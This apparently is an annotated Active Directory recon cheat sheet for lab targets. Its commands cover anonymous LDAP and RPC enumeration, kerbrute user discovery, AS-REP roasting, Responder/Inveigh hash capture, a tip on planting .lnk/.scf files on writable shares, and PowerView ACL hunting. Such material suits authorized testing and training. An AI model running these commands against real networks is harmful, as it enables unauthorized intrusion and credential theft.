Recon
# LDAP Enumeration
# Anonymous simple bind (-x with no bind DN), base scope (-s base), asking the rootDSE
# only for its namingContexts attribute. If this succeeds the DC permits unauthenticated
# LDAP reads, which is itself a finding worth reporting.
ldapsearch -H ldap://dc.zencorp.htb -x -s base namingcontexts
# LDAP rootDSE dump
# Same anonymous base-scope query against an empty base DN (-b ''), returning every
# rootDSE attribute ("*").
ldapsearch -H ldap://192.168.110.55 -x -s base -b '' "(objectClass=*)" "*"
# LDAP Domain dump
# Authenticated dump of the directory (users, groups, computers, policies) into /tmp (-o).
# The password is passed on argv, so it lands in shell history and is visible in process
# listings; consider omitting -p so the tool prompts for it instead.
ldapdomaindump -u 'domain.tld\username' -p password -o /tmp dc-ip-address
# Find users by SID's
# RID cycling over MS-RPC as the guest account with an empty password (-no-pass):
# resolves SIDs to account names without any valid credential.
impacket-lookupsid guest@10.10.11.35 -no-pass
# Enum4linux
# -P restricts enum4linux to password-policy information.
enum4linux -P 172.16.5.5
# Enumerate password policy
# enum4linux-ng equivalent of the line above; -oA writes the results in every supported
# output format (JSON and YAML) using "ilfreight" as the filename prefix.
enum4linux-ng -P 172.16.5.5 -oA ilfreight
Use LLMNR/NBT-NS response spoofing to capture hashes with Responder or Inveigh. Check for write access on SMB shares; a malicious .lnk or .scf file on such a share makes connecting clients authenticate to the attack host.
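# Responder linux
# Listens on the tun0 interface (-I) for LLMNR/NBT-NS name requests. Its raw-socket
# listeners need root, hence sudo; the original "/sudo responder" had a stray leading
# slash and would not resolve as a command.
sudo responder -I tun0
# Inveigh in powershell
# Compiled Inveigh binary run from the current directory; same listener role on a
# Windows host.
.\Inveigh.exe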
User enumeration
# Kerbrute
# Validates candidate usernames from the seclists xato-net wordlist against the DC (--dc)
# using Kerberos pre-authentication responses. Every candidate is an AS-REQ at the KDC,
# so a list this large is noisy and easy to spot in DC Kerberos logging.
kerbrute userenum -d ZENCORP.LOCAL /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt --dc 10.10.10.175
# GetNPUsers.py
# AS-REP roasting without credentials (nothing follows 'ZENCORP.LOCAL/'): for each name
# in users.txt an AS-REP is requested from the DC (-dc-ip); accounts with Kerberos
# pre-authentication disabled answer with crackable material, written in hashcat
# format (-format) to hashes.aspreroast (-outputfile).
GetNPUsers.py 'ZENCORP.LOCAL/' -usersfile users.txt -format hashcat -outputfile hashes.aspreroast -dc-ip 10.10.10.175
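# Rpcclient
# Null session: empty username (-U "") and -N suppresses the password prompt. The
# original notes had the "rpcclient $>" prompt text fused onto the end of the command
# and the subcommand name truncated; the real subcommand is enumdomusers, run here
# non-interactively via -c (it can equally be typed at the interactive prompt).
rpcclient -U "" -N 172.16.210.5 -c 'enumdomusers'
# Crackmapexec
# Domain user listing over SMB (--users). The first form sends no credentials and
# presumably relies on anonymous/null access; the second authenticates as user/password,
# which then sits in shell history and process listings.
crackmapexec smb 172.16.51.15 --users
crackmapexec smb 172.16.51.51 -u user -p password --users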
PowerView enumeration
# Find interesting ACLs (privilege escalation paths)
# PowerView: walks domain object ACLs and reports ACEs that grant modification
# rights to non-default principals.
Find-InterestingDomainAcl
# Get ACLs for specific user
# Direction: ACEs *held by* mczen. Resolve the name to a SID, then keep every
# domain-object ACE whose trustee (SecurityIdentifier) is that SID. -ResolveGUIDs
# turns extended-right GUIDs into readable names.
$sid = Convert-NameToSid mczen
Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $sid}
# Get basic user info
Get-DomainUser "username"
# Get user's group memberships
# NOTE(review): -UserName appears to be an alias of -MemberIdentity in current
# PowerView (groups this account belongs to) — confirm on the version in use.
Get-DomainGroup -UserName "username"
# Get members of specific group
Get-DomainGroupMember "Domain Admins"
# Detailed ACL permissions for user
# Direction: ACEs *on* the user object, i.e. who holds rights over "username"
# (the opposite of the Convert-NameToSid query above).
Get-DomainObjectACL -SamAccountName "username" -ResolveGUIDs
# Find privileged users (AdminCount=1)
# adminCount=1 marks accounts that are or once were protected by AdminSDHolder; the
# flag is not cleared when privileges are removed, so review the list rather than
# treating it as the current set of privileged accounts.
Get-DomainUser -AdminCount
# Get domain password policy
Get-DomainPolicy
# Enumerate all users
Get-DomainUser
# Enumerate all computers
Get-DomainComputer
# Enumerate all groups
Get-DomainGroup
# Get nested group memberships
# MemberOf lists the groups that "IT" is itself a direct member of (its parents), not
# IT's own members, and only one level up; repeat on the results for deeper nesting.
Get-DomainGroup -Identity "IT" -Properties MemberOf | Select-Object -ExpandProperty MemberOf
Windapsearch
# Check for bind
# -u "" attempts an anonymous bind; --functionality reads the domain functional level,
# which the rootDSE exposes without authentication. Success confirms anonymous LDAP
# access is allowed on this DC.
python3 windapsearch.py --dc-ip 10.129.1.111 -u "" --functionality
# Get domain users
python3 windapsearch.py --dc-ip 10.129.1.207 -u "" -U
# Get domain computers
python3 windapsearch.py --dc-ip 10.129.1.207 -u "" -C
# Search for OU by user
# -s is windapsearch's fuzzy search: it returns any entry matching "john doe", not only OUs.
python3 windapsearch.py --dc-ip 10.129.42.188 -u "" -s "john doe"
# Show groups
python3 windapsearch.py --dc-ip 10.129.42.188 -u "" -G
# Unconstrained delegation
# Lists user accounts flagged for unconstrained delegation. Such accounts receive and
# cache other principals' TGTs, so defenders should keep this set as small as possible.
python3 windapsearch.py --dc-ip 10.129.42.188 -u "" -U --unconstrained-users
Ldapsearch-ad.py
# Check password policy
# ldapsearch-ad.py against the DC (-l) as domain user john.doe; -t selects the query type.
# The plaintext password on argv ends up in shell history and process listings.
python3 ldapsearch-ad.py -l 10.129.1.207 -d zencorp -u john.doe -p pass123 -t pass-pols
# Check for Kerberoastable users
# -t kerberoast lists accounts carrying SPNs; the grep keeps only the servicePrincipalName lines.
python3 ldapsearch-ad.py -l 10.129.1.207 -d zencorp -u john.doe -p pass123 -t kerberoast | grep servicePrincipalName
# Check for ASREPRoastable users
# -t asreproast lists accounts with Kerberos pre-authentication disabled.
python3 ldapsearch-ad.py -l 10.129.1.207 -d zencorp -u john.doe -p pass123 -t asreproast